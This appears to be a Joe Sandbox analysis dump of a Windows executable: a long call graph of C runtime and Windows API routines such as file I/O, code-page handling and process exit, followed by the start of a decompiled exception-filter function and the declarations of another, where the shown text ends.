8908->8903 8909->8905 8948 4080af 8910->8948 8913 4091c9 GetOEMCP 8915 4091f2 8913->8915 8914 4091db 8914->8915 8916 4091e0 GetACP 8914->8916 8915->8887 8917 40a6a3 8915->8917 8916->8915 8918 40a6e1 8917->8918 8923 40a6b1 _unexpected 8917->8923 8919 407b6a __dosmaperr 14 API calls 8918->8919 8921 40a6df 8919->8921 8920 40a6cc HeapAlloc 8920->8921 8920->8923 8921->8882 8922 40b172 _unexpected 2 API calls 8922->8923 8923->8918 8923->8920 8923->8922 8925 4091a8 41 API calls 8924->8925 8927 409691 8925->8927 8926 409796 9028 401be5 8926->9028 8927->8926 8929 4096ce IsValidCodePage 8927->8929 8934 4096e9 __fread_nolock 8927->8934 8929->8926 8931 4096e0 8929->8931 8930 4094b8 8930->8889 8930->8894 8932 409709 GetCPInfo 8931->8932 8931->8934 8932->8926 8932->8934 9017 40927c 8934->9017 8936 4090a6 ___scrt_is_nonwritable_in_current_image 8935->8936 9102 409f3e EnterCriticalSection 8936->9102 8938 4090b0 9103 4090e7 8938->9103 8943->8904 8947 409f86 LeaveCriticalSection 8944->8947 8946 4095fc 8946->8908 8947->8946 8949 4080c6 8948->8949 8950 4080cd 8948->8950 8949->8913 8949->8914 8950->8949 8956 406c70 GetLastError 8950->8956 8957 406c8c 8956->8957 8958 406c86 8956->8958 8960 40aedd _unexpected 6 API calls 8957->8960 8962 406c90 SetLastError 8957->8962 8959 40ae9e _unexpected 6 API calls 8958->8959 8959->8957 8961 406ca8 8960->8961 8961->8962 8964 408637 _unexpected 14 API calls 8961->8964 8966 406d20 8962->8966 8967 406d25 8962->8967 8965 406cbd 8964->8965 8969 406cc5 8965->8969 8970 406cd6 8965->8970 8983 408131 8966->8983 8968 40623e __FrameHandler3::FrameUnwindToState 37 API calls 8967->8968 8972 406d2a 8968->8972 8973 40aedd _unexpected 6 API calls 8969->8973 8971 40aedd _unexpected 6 API calls 8970->8971 8974 406ce2 8971->8974 8975 406cd3 8973->8975 8976 406ce6 8974->8976 8977 406cfd 8974->8977 8979 408694 __freea 14 API calls 8975->8979 8978 40aedd _unexpected 6 API calls 8976->8978 8980 406a9e _unexpected 14 API calls 8977->8980 8978->8975 8979->8962 8981 406d08 8980->8981 8982 408694 __freea 14 API calls 8981->8982 8982->8962 8984 408144 8983->8984 8985 408104 8983->8985 8984->8985 8991 40aadb 8984->8991 8987 40818f 8985->8987 8988 4081a2 8987->8988 8989 4081b7 8987->8989 8988->8989 9012 40965e 8988->9012 8989->8949 8992 40aae7 ___scrt_is_nonwritable_in_current_image 8991->8992 8993 406c70 _unexpected 39 API calls 8992->8993 8994 40aaf0 8993->8994 8995 40ab36 8994->8995 9004 409f3e EnterCriticalSection 8994->9004 8995->8985 8997 40ab0e 9005 40ab5c 8997->9005 9002 40623e __FrameHandler3::FrameUnwindToState 39 API calls 9003 40ab5b 9002->9003 9004->8997 9006 40ab1f 9005->9006 9007 40ab6a _unexpected 9005->9007 9009 40ab3b 9006->9009 9007->9006 9008 40a88f _unexpected 14 API calls 9007->9008 9008->9006 9010 409f86 __FrameHandler3::FrameUnwindToState LeaveCriticalSection 9009->9010 9011 40ab32 9010->9011 9011->8995 9011->9002 9013 406c70 _unexpected 39 API calls 9012->9013 9014 409663 9013->9014 9015 409576 __wsopen_s 39 API calls 9014->9015 9016 40966e 9015->9016 9016->8989 9018 4092a4 GetCPInfo 9017->9018 9019 40936d 9017->9019 9018->9019 9025 4092bc 9018->9025 9021 401be5 _ValidateLocalCookies 5 API calls 9019->9021 9023 40941f 9021->9023 9023->8926 9035 40a6f1 9025->9035 9027 40dbf3 43 API calls 9027->9019 9029 401bed 9028->9029 9030 401bee IsProcessorFeaturePresent 9028->9030 9029->8930 9032 401c30 9030->9032 9101 401bf3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9032->9101 9034 401d13 9034->8930 9036 4080af __wsopen_s 39 API calls 9035->9036 9037 40a711 9036->9037 9055 409976 9037->9055 9039 40a7cd 9042 401be5 _ValidateLocalCookies 5 API calls 9039->9042 9040 40a7c5 9058 40a7f2 9040->9058 9041 40a73e 9041->9039 9041->9040 9044 40a6a3 __fread_nolock 15 API calls 9041->9044 9046 40a763 __fread_nolock __alloca_probe_16 9041->9046 9045 409324 9042->9045 9044->9046 9050 40dbf3 9045->9050 9046->9040 9047 409976 __wsopen_s MultiByteToWideChar 9046->9047 9048 40a7ac 9047->9048 9048->9040 9049 40a7b3 GetStringTypeW 9048->9049 9049->9040 9051 4080af __wsopen_s 39 API calls 9050->9051 9052 40dc06 9051->9052 9064 40da04 9052->9064 9062 4098de 9055->9062 9059 40a80f 9058->9059 9060 40a7fe 9058->9060 9059->9039 9060->9059 9061 408694 __freea 14 API calls 9060->9061 9061->9059 9063 4098ef MultiByteToWideChar 9062->9063 9063->9041 9065 40da1f 9064->9065 9066 409976 __wsopen_s MultiByteToWideChar 9065->9066 9070 40da63 9066->9070 9067 40dbde 9068 401be5 _ValidateLocalCookies 5 API calls 9067->9068 9069 409345 9068->9069 9069->9027 9070->9067 9071 40a6a3 __fread_nolock 15 API calls 9070->9071 9073 40da89 __alloca_probe_16 9070->9073 9084 40db31 9070->9084 9071->9073 9072 40a7f2 __freea 14 API calls 9072->9067 9074 409976 __wsopen_s MultiByteToWideChar 9073->9074 9073->9084 9075 40dad2 9074->9075 9075->9084 9092 40af6a 9075->9092 9078 40db40 9080 40dbc9 9078->9080 9082 40a6a3 __fread_nolock 15 API calls 9078->9082 9085 40db52 __alloca_probe_16 9078->9085 9079 40db08 9081 40af6a 6 API calls 9079->9081 9079->9084 9083 40a7f2 __freea 14 API calls 9080->9083 9081->9084 9082->9085 9083->9084 9084->9072 9085->9080 9086 40af6a 6 API calls 9085->9086 9087 40db95 9086->9087 9087->9080 9098 409a30 9087->9098 9089 40dbaf 9089->9080 9090 40dbb8 9089->9090 9091 40a7f2 __freea 14 API calls 9090->9091 9091->9084 9093 40abe0 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9092->9093 9094 40af75 9093->9094 9095 40afc7 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9094->9095 9097 40af7b 9094->9097 9096 40afbb LCMapStringW 9095->9096 9096->9097 9097->9078 9097->9079 9097->9084 9099 409a43 __wsopen_s 9098->9099 9100 409a81 WideCharToMultiByte 9099->9100 9100->9089 9101->9034 9102->8938 9113 404e41 9103->9113 9105 409109 9106 404e41 __fread_nolock 39 API calls 9105->9106 9107 409128 9106->9107 9108 4090bd 9107->9108 9109 408694 __freea 14 API calls 9107->9109 9110 4090db 9108->9110 9109->9108 9127 409f86 LeaveCriticalSection 9110->9127 9112 4090c9 9112->8895 9114 404e52 9113->9114 9118 404e4e __fread_nolock 9113->9118 9115 404e59 9114->9115 9119 404e6c __fread_nolock 9114->9119 9116 407b6a __dosmaperr 14 API calls 9115->9116 9117 404e5e 9116->9117 9120 406567 ___std_exception_copy 39 API calls 9117->9120 9118->9105 9119->9118 9121 404ea3 9119->9121 9122 404e9a 9119->9122 9120->9118 9121->9118 9125 407b6a __dosmaperr 14 API calls 9121->9125 9123 407b6a __dosmaperr 14 API calls 9122->9123 9124 404e9f 9123->9124 9126 406567 ___std_exception_copy 39 API calls 9124->9126 9125->9124 9126->9118 9127->9112 9129 4061f2 9128->9129 9130 406200 9128->9130 9129->9130 9135 406218 9129->9135 9131 407b6a __dosmaperr 14 API calls 9130->9131 9132 406208 9131->9132 9134 406567 ___std_exception_copy 39 API calls 9132->9134 9133 406212 9133->8843 9134->9133 9135->9133 9136 407b6a __dosmaperr 14 API calls 9135->9136 9136->9132 9138 405504 9137->9138 9139 405533 9137->9139 9138->8844 9140 40554a 9139->9140 9141 408694 __freea 14 API calls 9139->9141 9142 408694 __freea 14 API calls 9140->9142 9141->9139 9142->9138 9161 40475c 9143->9161 9146 404b74 9147 404b87 ___std_exception_copy 9146->9147 9212 404905 9147->9212 9150 4042bb ___std_exception_copy 39 API calls 9151 401056 9150->9151 9152 40472c 9151->9152 9153 40473f ___std_exception_copy 9152->9153 9398 404020 9153->9398 9156 4042bb ___std_exception_copy 39 API calls 9157 401062 9156->9157 9157->8423 9469 404da4 9158->9469 9162 404768 ___scrt_is_nonwritable_in_current_image 9161->9162 9163 40476f 9162->9163 9165 40478f 9162->9165 9164 407b6a __dosmaperr 14 API calls 9163->9164 9166 404774 9164->9166 9167 4047a1 9165->9167 9168 404794 9165->9168 9169 406567 ___std_exception_copy 39 API calls 9166->9169 9178 407b7d 9167->9178 9170 407b6a __dosmaperr 14 API calls 9168->9170 9172 401043 9169->9172 9170->9172 9172->9146 9174 4047b1 9176 407b6a __dosmaperr 14 API calls 9174->9176 9175 4047be 9186 4047fc 9175->9186 9176->9172 9179 407b89 ___scrt_is_nonwritable_in_current_image 9178->9179 9190 409f3e EnterCriticalSection 9179->9190 9181 407b97 9191 407c21 9181->9191 9187 404800 9186->9187 9211 4066fa LeaveCriticalSection 9187->9211 9189 404811 9189->9172 9190->9181 9199 407c44 9191->9199 9192 407ba4 9204 407bdd 9192->9204 9193 407c9c 9194 408637 _unexpected 14 API calls 9193->9194 9195 407ca5 9194->9195 9197 408694 __freea 14 API calls 9195->9197 9198 407cae 9197->9198 9198->9192 9200 40af1f __wsopen_s 6 API calls 9198->9200 9199->9192 9199->9193 9207 4066e6 EnterCriticalSection 9199->9207 9208 4066fa LeaveCriticalSection 9199->9208 9202 407ccd 9200->9202 9209 4066e6 EnterCriticalSection 9202->9209 9210 409f86 LeaveCriticalSection 9204->9210 9206 4047aa 9206->9174 9206->9175 9207->9199 9208->9199 9209->9192 9210->9206 9211->9189 9214 404911 ___scrt_is_nonwritable_in_current_image 9212->9214 9213 404917 9215 4064ea ___std_exception_copy 39 API calls 9213->9215 9214->9213 9217 40495a 9214->9217 9216 404932 9215->9216 9216->9150 9223 4066e6 EnterCriticalSection 9217->9223 9219 404966 9224 404a88 9219->9224 9221 40497c 9233 4049a5 9221->9233 9223->9219 9225 404a9b 9224->9225 9226 404aae 9224->9226 9225->9221 9236 4049af 9226->9236 9228 404b5f 9228->9221 9229 404ad1 9229->9228 9240 4083c6 9229->9240 9397 4066fa LeaveCriticalSection 9233->9397 9235 4049ad 9235->9216 9237 4049c0 9236->9237 9239 404a18 9236->9239 9237->9239 9249 4068d4 9237->9249 9239->9229 9241 4083df 9240->9241 9245 404aff 9240->9245 9241->9245 9277 4065ab 9241->9277 9243 4083fb 9284 40cfd9 9243->9284 9246 406914 9245->9246 9247 406833 __fread_nolock 41 API calls 9246->9247 9248 40692d 9247->9248 9248->9228 9250 4068e8 ___std_exception_copy 9249->9250 9255 406833 9250->9255 9252 4068fd 9253 4042bb ___std_exception_copy 39 API calls 9252->9253 9254 40690c 9253->9254 9254->9239 9261 40a3b3 9255->9261 9257 406845 9258 406861 SetFilePointerEx 9257->9258 9260 40684d __wsopen_s 9257->9260 9259 406879 GetLastError 9258->9259 9258->9260 9259->9260 9260->9252 9262 40a3c0 9261->9262 9265 40a3d5 9261->9265 9274 407b57 9262->9274 9266 407b57 __dosmaperr 14 API calls 9265->9266 9268 40a3fa 9265->9268 9269 40a405 9266->9269 9267 407b6a __dosmaperr 14 API calls 9270 40a3cd 9267->9270 9268->9257 9271 407b6a __dosmaperr 14 API calls 9269->9271 9270->9257 9272 40a40d 9271->9272 9273 406567 ___std_exception_copy 39 API calls 9272->9273 9273->9270 9275 406dc1 __dosmaperr 14 API calls 9274->9275 9276 407b5c 9275->9276 9276->9267 9278 4065b7 9277->9278 9279 4065cc 9277->9279 9280 407b6a __dosmaperr 14 API calls 9278->9280 9279->9243 9281 4065bc 9280->9281 9282 406567 ___std_exception_copy 39 API calls 9281->9282 9283 4065c7 9282->9283 9283->9243 9285 40cfe5 ___scrt_is_nonwritable_in_current_image 9284->9285 9286 40d026 9285->9286 9287 40d06c 9285->9287 9294 40cfed 9285->9294 9288 4064ea ___std_exception_copy 39 API calls 9286->9288 9295 40a137 EnterCriticalSection 9287->9295 9288->9294 9290 40d072 9291 40d090 9290->9291 9296 40d0ea 9290->9296 9322 40d0e2 9291->9322 9294->9245 9295->9290 9297 40d112 9296->9297 9300 40d135 __wsopen_s 9296->9300 9298 40d116 9297->9298 9301 40d171 9297->9301 9299 4064ea ___std_exception_copy 39 API calls 9298->9299 9299->9300 9300->9291 9302 40d18f 9301->9302 9303 406914 __wsopen_s 41 API calls 9301->9303 9325 40cc2f 9302->9325 9303->9302 9306 40d1a7 9308 40d1d6 9306->9308 9309 40d1af 9306->9309 9307 40d1ee 9310 40d202 9307->9310 9311 40d257 WriteFile 9307->9311 9337 40c800 GetConsoleOutputCP 9308->9337 9309->9300 9332 40cbc7 9309->9332 9314 40d243 9310->9314 9315 40d20a 9310->9315 9311->9300 9313 40d279 GetLastError 9311->9313 9313->9300 9365 40ccac 9314->9365 9318 40d22f 9315->9318 9320 40d20f 9315->9320 9357 40ce70 9318->9357 9320->9300 9350 40cd87 9320->9350 9396 40a1ec LeaveCriticalSection 9322->9396 9324 40d0e8 9324->9294 9372 40bb62 9325->9372 9327 40cca5 9327->9306 9327->9307 9328 40cc41 9328->9327 9329 40cc6f 9328->9329 9381 404830 9328->9381 9329->9327 9331 40cc89 GetConsoleMode 9329->9331 9331->9327 9333 40cc1e 9332->9333 9336 40cbe9 9332->9336 9333->9300 9334 40e770 5 API calls __wsopen_s 9334->9336 9335 40cc20 GetLastError 9335->9333 9336->9333 9336->9334 9336->9335 9338 40c872 9337->9338 9347 40c879 __fread_nolock 9337->9347 9339 404830 __wsopen_s 39 API calls 9338->9339 9339->9347 9340 401be5 _ValidateLocalCookies 5 API calls 9341 40cbc0 9340->9341 9341->9300 9342 40b944 40 API calls __wsopen_s 9342->9347 9343 40cb2f 9343->9340 9344 40e089 5 API calls __wsopen_s 9344->9347 9345 409a30 __wsopen_s WideCharToMultiByte 9345->9347 9346 40caa8 WriteFile 9346->9347 9348 40cb9e GetLastError 9346->9348 9347->9342 9347->9343 9347->9344 9347->9345 9347->9346 9349 40cae6 WriteFile 9347->9349 9348->9343 9349->9347 9349->9348 9354 40cd96 __wsopen_s 9350->9354 9351 40ce55 9353 401be5 _ValidateLocalCookies 5 API calls 9351->9353 9352 40ce0b WriteFile 9352->9354 9355 40ce57 GetLastError 9352->9355 9356 40ce6e 9353->9356 9354->9351 9354->9352 9355->9351 9356->9300 9364 40ce7f __wsopen_s 9357->9364 9358 40cf87 9359 401be5 _ValidateLocalCookies 5 API calls 9358->9359 9360 40cfa0 9359->9360 9360->9300 9361 409a30 __wsopen_s WideCharToMultiByte 9361->9364 9362 40cf89 GetLastError 9362->9358 9363 40cf3e WriteFile 9363->9362 9363->9364 9364->9358 9364->9361 9364->9362 9364->9363 9370 40ccbb __wsopen_s 9365->9370 9366 40cd6c 9367 401be5 _ValidateLocalCookies 5 API calls 9366->9367 9368 40cd85 9367->9368 9368->9300 9369 40cd2b WriteFile 9369->9370 9371 40cd6e GetLastError 9369->9371 9370->9366 9370->9369 9371->9366 9373 40bb6f 9372->9373 9375 40bb7c 9372->9375 9374 407b6a __dosmaperr 14 API calls 9373->9374 9378 40bb74 9374->9378 9376 40bb88 9375->9376 9377 407b6a __dosmaperr 14 API calls 9375->9377 9376->9328 9379 40bba9 9377->9379 9378->9328 9380 406567 ___std_exception_copy 39 API calls 9379->9380 9380->9378 9382 404704 ___std_exception_copy 39 API calls 9381->9382 9383 404840 9382->9383 9388 40815e 9383->9388 9389 408175 9388->9389 9390 40485d 9388->9390 9389->9390 9391 40aadb __wsopen_s 39 API calls 9389->9391 9392 4081bc 9390->9392 9391->9390 9393 4081d3 9392->9393 9395 40486a 9392->9395 9394 40965e __wsopen_s 39 API calls 9393->9394 9393->9395 9394->9395 9395->9329 9396->9324 9397->9235 9399 40402c ___scrt_is_nonwritable_in_current_image 9398->9399 9400 404033 9399->9400 9401 404054 9399->9401 9402 4064ea ___std_exception_copy 39 API calls 9400->9402 9409 4066e6 EnterCriticalSection 9401->9409 9408 40404c 9402->9408 9404 40405f 9410 4040a0 9404->9410 9408->9156 9409->9404 9416 4040d2 9410->9416 9412 40406e 9413 404096 9412->9413 9468 4066fa LeaveCriticalSection 9413->9468 9415 40409e 9415->9408 9417 4040e1 9416->9417 9418 404109 9416->9418 9420 4064ea ___std_exception_copy 39 API calls 9417->9420 9419 4065ab __fread_nolock 39 API calls 9418->9419 9421 404112 9419->9421 9429 4040fc __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 9420->9429 9430 4068b6 9421->9430 9424 4041bc 9433 4044c2 9424->9433 9427 4041d3 9427->9429 9445 4042f7 9427->9445 9429->9412 9452 40670e 9430->9452 9434 4044d1 __wsopen_s 9433->9434 9435 4065ab __fread_nolock 39 API calls 9434->9435 9437 4044ed __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 9435->9437 9436 401be5 _ValidateLocalCookies 5 API calls 9438 4041cb 9436->9438 9439 4068b6 43 API calls 9437->9439 9444 4044f9 9437->9444 9438->9429 9440 40454d 9439->9440 9441 40457f ReadFile 9440->9441 9440->9444 9442 4045a6 9441->9442 9441->9444 9443 4068b6 43 API calls 9442->9443 9443->9444 9444->9436 9446 4065ab __fread_nolock 39 API calls 9445->9446 9447 40430a 9446->9447 9448 4068b6 43 API calls 9447->9448 9451 404354 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 9447->9451 9449 4043b1 9448->9449 9450 4068b6 43 API calls 9449->9450 9449->9451 9450->9451 9451->9429 9454 40671a ___scrt_is_nonwritable_in_current_image 9452->9454 9453 404130 9453->9424 9453->9427 9453->9429 9454->9453 9455 40675d 9454->9455 9457 4067a3 9454->9457 9456 4064ea ___std_exception_copy 39 API calls 9455->9456 9456->9453 9463 40a137 EnterCriticalSection 9457->9463 9459 4067a9 9460 406833 __fread_nolock 41 API calls 9459->9460 9462 4067ca 9459->9462 9460->9462 9464 40682b 9462->9464 9463->9459 9467 40a1ec LeaveCriticalSection 9464->9467 9466 406831 9466->9453 9467->9466 9468->9415 9470 404db0 ___scrt_is_nonwritable_in_current_image 9469->9470 9471 404dc3 __fread_nolock 9470->9471 9472 404dfa 9470->9472 9481 4010a1 9470->9481 9474 407b6a __dosmaperr 14 API calls 9471->9474 9482 4066e6 EnterCriticalSection 9472->9482 9476 404ddd 9474->9476 9475 404e04 9483 404bae 9475->9483 9478 406567 ___std_exception_copy 39 API calls 9476->9478 9478->9481 9482->9475 9486 404bc0 __fread_nolock 9483->9486 9490 404bdd 9483->9490 9484 404bcd 9485 407b6a __dosmaperr 14 API calls 9484->9485 9494 404bd2 9485->9494 9486->9484 9488 404c1e __fread_nolock 9486->9488 9486->9490 9487 406567 ___std_exception_copy 39 API calls 9487->9490 9489 404d49 __fread_nolock 9488->9489 9488->9490 9491 404e41 __fread_nolock 39 API calls 9488->9491 9492 4065ab __fread_nolock 39 API calls 9488->9492 9499 407550 9488->9499 9493 407b6a __dosmaperr 14 API calls 9489->9493 9496 404e39 9490->9496 9491->9488 9492->9488 9493->9494 9494->9487 9596 4066fa LeaveCriticalSection 9496->9596 9498 404e3f 9498->9481 9500 407562 9499->9500 9501 40757a 9499->9501 9502 407b57 __dosmaperr 14 API calls 9500->9502 9503 4078bc 9501->9503 9508 4075bd 9501->9508 9504 407567 9502->9504 9505 407b57 __dosmaperr 14 API calls 9503->9505 9506 407b6a __dosmaperr 14 API calls 9504->9506 9507 4078c1 9505->9507 9509 40756f 9506->9509 9510 407b6a __dosmaperr 14 API calls 9507->9510 9508->9509 9511 4075c8 9508->9511 9515 4075f8 9508->9515 9509->9488 9512 4075d5 9510->9512 9513 407b57 __dosmaperr 14 API calls 9511->9513 9516 406567 ___std_exception_copy 39 API calls 9512->9516 9514 4075cd 9513->9514 9517 407b6a __dosmaperr 14 API calls 9514->9517 9518 407611 9515->9518 9520 40764c 9515->9520 9521 40761e 9515->9521 9516->9509 9517->9512 9519 40763a 9518->9519 9518->9521 9528 40bb62 __fread_nolock 39 API calls 9519->9528 9524 40a6a3 __fread_nolock 15 API calls 9520->9524 9523 407b57 __dosmaperr 14 API calls 9521->9523 9525 407623 9523->9525 9526 40765d 9524->9526 9527 407b6a __dosmaperr 14 API calls 9525->9527 9529 408694 __freea 14 API calls 9526->9529 9530 40762a 9527->9530 9531 407798 9528->9531 9532 407666 9529->9532 9533 406567 ___std_exception_copy 39 API calls 9530->9533 9534 40780c 9531->9534 9537 4077b1 GetConsoleMode 9531->9537 9535 408694 __freea 14 API calls 9532->9535 9563 407635 __fread_nolock 9533->9563 9536 407810 ReadFile 9534->9536 9538 40766d 9535->9538 9539 407884 GetLastError 9536->9539 9540 407828 9536->9540 9537->9534 9541 4077c2 9537->9541 9543 407692 9538->9543 9544 407677 9538->9544 9545 407891 9539->9545 9546 4077e8 9539->9546 9540->9539 9547 407801 9540->9547 9541->9536 9542 4077c8 ReadConsoleW 9541->9542 9542->9547 9548 4077e2 GetLastError 9542->9548 9552 4068d4 __fread_nolock 41 API calls 9543->9552 9550 407b6a __dosmaperr 14 API calls 9544->9550 9551 407b6a __dosmaperr 14 API calls 9545->9551 9546->9563 9566 407b10 9546->9566 9557 407864 9547->9557 9558 40784d 9547->9558 9547->9563 9548->9546 9549 408694 __freea 14 API calls 9549->9509 9554 40767c 9550->9554 9555 407896 9551->9555 9556 4076a0 9552->9556 9559 407b57 __dosmaperr 14 API calls 9554->9559 9560 407b57 __dosmaperr 14 API calls 9555->9560 9556->9519 9562 40787d 9557->9562 9557->9563 9571 407262 9558->9571 9565 407687 9559->9565 9560->9563 9584 4070a8 9562->9584 9563->9549 9565->9563 9567 407b57 __dosmaperr 14 API calls 9566->9567 9568 407b1b __dosmaperr 9567->9568 9569 407b6a __dosmaperr 14 API calls 9568->9569 9570 407b2e 9569->9570 9570->9563 9590 406f5b 9571->9590 9573 409976 __wsopen_s MultiByteToWideChar 9574 407376 9573->9574 9578 40737f GetLastError 9574->9578 9581 4072aa 9574->9581 9575 407304 9582 4072be 9575->9582 9583 4068d4 __fread_nolock 41 API calls 9575->9583 9576 4072f4 9579 407b6a __dosmaperr 14 API calls 9576->9579 9580 407b10 __dosmaperr 14 API calls 9578->9580 9579->9581 9580->9581 9581->9563 9582->9573 9583->9582 9585 4070e2 9584->9585 9586 407178 ReadFile 9585->9586 9587 407173 9585->9587 9586->9587 9588 407195 9586->9588 9587->9565 9588->9587 9589 4068d4 __fread_nolock 41 API calls 9588->9589 9589->9587 9591 406f8f 9590->9591 9592 407000 ReadFile 9591->9592 9593 406ffb 9591->9593 9592->9593 9594 407019 9592->9594 9593->9575 9593->9576 9593->9581 9593->9582 9594->9593 9595 4068d4 __fread_nolock 41 API calls 9594->9595 9595->9593 9596->9498 9598 405853 9597->9598 9606 405864 9597->9606 9608 4018b6 GetModuleHandleW 9598->9608 9602 401419 9602->8441 9615 4056d6 9606->9615 9609 4018c2 9608->9609 9609->9606 9610 405907 GetModuleHandleExW 9609->9610 9611 405946 GetProcAddress 9610->9611 9612 40595a 9610->9612 9611->9612 9613 405976 9612->9613 9614 40596d FreeLibrary 9612->9614 9613->9606 9614->9613 9616 4056e2 ___scrt_is_nonwritable_in_current_image 9615->9616 9630 409f3e EnterCriticalSection 9616->9630 9618 4056ec 9631 40573e 9618->9631 9620 4056f9 9635 405717 9620->9635 9623 4058bd 9660 4058ee 9623->9660 9625 4058c7 9626 4058db 9625->9626 9627 4058cb GetCurrentProcess TerminateProcess 9625->9627 9628 405907 __FrameHandler3::FrameUnwindToState 3 API calls 9626->9628 9627->9626 9629 4058e3 ExitProcess 9628->9629 9630->9618 9632 40574a ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState 9631->9632 9634 4057ae __FrameHandler3::FrameUnwindToState 9632->9634 9638 405f4c 9632->9638 9634->9620 9659 409f86 LeaveCriticalSection 9635->9659 9637 405705 9637->9602 9637->9623 9639 405f58 __EH_prolog3 9638->9639 9642 405ca4 9639->9642 9641 405f7f __FrameHandler3::FrameUnwindToState 9641->9634 9643 405cb0 ___scrt_is_nonwritable_in_current_image 9642->9643 9650 409f3e EnterCriticalSection 9643->9650 9645 405cbe 9651 405e5c 9645->9651 9650->9645 9652 405ccb 9651->9652 9653 405e7b 9651->9653 9655 405cf3 9652->9655 9653->9652 9654 408694 __freea 14 API calls 9653->9654 9654->9652 9658 409f86 LeaveCriticalSection 9655->9658 9657 405cdc 9657->9641 9658->9657 9659->9637 9663 409fc2 9660->9663 9662 4058f3 __FrameHandler3::FrameUnwindToState 9662->9625 9664 409fd1 __FrameHandler3::FrameUnwindToState 9663->9664 9665 409fde 9664->9665 9667 40ad64 9664->9667 9665->9662 9668 40acdf _unexpected 5 API calls 9667->9668 9669 40ad80 9668->9669 9669->9665 10953 406b37 10954 406b42 10953->10954 10955 406b52 10953->10955 10959 406b58 10954->10959 10958 408694 __freea 14 API calls 10958->10955 10960 406b73 10959->10960 10961 406b6d 10959->10961 10963 408694 __freea 14 API calls 10960->10963 10962 408694 __freea 14 API calls 10961->10962 10962->10960 10964 406b7f 10963->10964 10965 408694 __freea 14 API calls 10964->10965 10966 406b8a 10965->10966 10967 408694 __freea 14 API calls 10966->10967 10968 406b95 10967->10968 10969 408694 __freea 14 API calls 10968->10969 10970 406ba0 10969->10970 10971 408694 __freea 14 API calls 10970->10971 10972 406bab 10971->10972 10973 408694 __freea 14 API calls 10972->10973 10974 406bb6 10973->10974 10975 408694 __freea 14 API calls 10974->10975 10976 406bc1 10975->10976 10977 408694 __freea 14 API calls 10976->10977 10978 406bcc 10977->10978 10979 408694 __freea 14 API calls 10978->10979 10980 406bda 10979->10980 10985 406984 10980->10985 10986 406990 ___scrt_is_nonwritable_in_current_image 10985->10986 11001 409f3e EnterCriticalSection 10986->11001 10989 40699a 10991 408694 __freea 14 API calls 10989->10991 10992 4069c4 10989->10992 10991->10992 11002 4069e3 10992->11002 10993 4069ef 10994 4069fb ___scrt_is_nonwritable_in_current_image 10993->10994 11006 409f3e EnterCriticalSection 10994->11006 10996 406a05 10997 406c25 _unexpected 14 API calls 10996->10997 10998 406a18 10997->10998 11007 406a38 10998->11007 11001->10989 11005 409f86 LeaveCriticalSection 11002->11005 11004 4069d1 11004->10993 11005->11004 11006->10996 11010 409f86 LeaveCriticalSection 11007->11010 11009 406a26 11009->10958 11010->11009

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 291 4018f8-401903 SetUnhandledExceptionFilter
                                                          C-Code - Quality: 100%
                                                          			E004018F8() {
                                                          				_Unknown_base(*)()* _t1;
                                                          
                                                          				_t1 = SetUnhandledExceptionFilter(E00401904); // executed
                                                          				return _t1;
                                                          			}




                                                          0x004018fd
                                                          0x00401903

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00001904,00401293), ref: 004018FD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: b755dcbb7af07ac9c81e13e1733f710bb07da44beaed3427e740af2affbf1b5f
                                                          • Instruction ID: 3c76379c11a141df46b3ea9b27e7dd020c20bdbff8068edec9eb88929e08c5b5
                                                          • Opcode Fuzzy Hash: b755dcbb7af07ac9c81e13e1733f710bb07da44beaed3427e740af2affbf1b5f
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 38%
                                                          			E0040C3B7(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                          				signed int _v5;
                                                          				void* _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v24;
                                                          				char _v28;
                                                          				intOrPtr _v40;
                                                          				signed int _v48;
                                                          				void _v52;
                                                          				char _v76;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t114;
                                                          				void* _t122;
                                                          				signed int _t123;
                                                          				signed char _t124;
                                                          				signed int _t134;
                                                          				intOrPtr _t162;
                                                          				intOrPtr _t178;
                                                          				void* _t188;
                                                          				signed int* _t189;
                                                          				signed int _t191;
                                                          				signed int _t196;
                                                          				signed int _t202;
                                                          				signed int _t205;
                                                          				signed int _t214;
                                                          				signed int _t216;
                                                          				signed int _t218;
                                                          				signed int _t224;
                                                          				signed int _t226;
                                                          				signed int _t233;
                                                          				signed int _t234;
                                                          				signed int _t236;
                                                          				signed int _t238;
                                                          				signed char _t241;
                                                          				signed int _t242;
                                                          				intOrPtr _t246;
                                                          				void* _t249;
                                                          				void* _t253;
                                                          				void* _t263;
                                                          				signed int _t264;
                                                          				signed int _t267;
                                                          				signed int _t268;
                                                          				signed int _t271;
                                                          				void* _t273;
                                                          				void* _t275;
                                                          				void* _t276;
                                                          				void* _t278;
                                                          				void* _t279;
                                                          				void* _t281;
                                                          				void* _t285;
                                                          
                                                          				_t263 = E0040C105(__ecx,  &_v76, _a16, _a20, _a24);
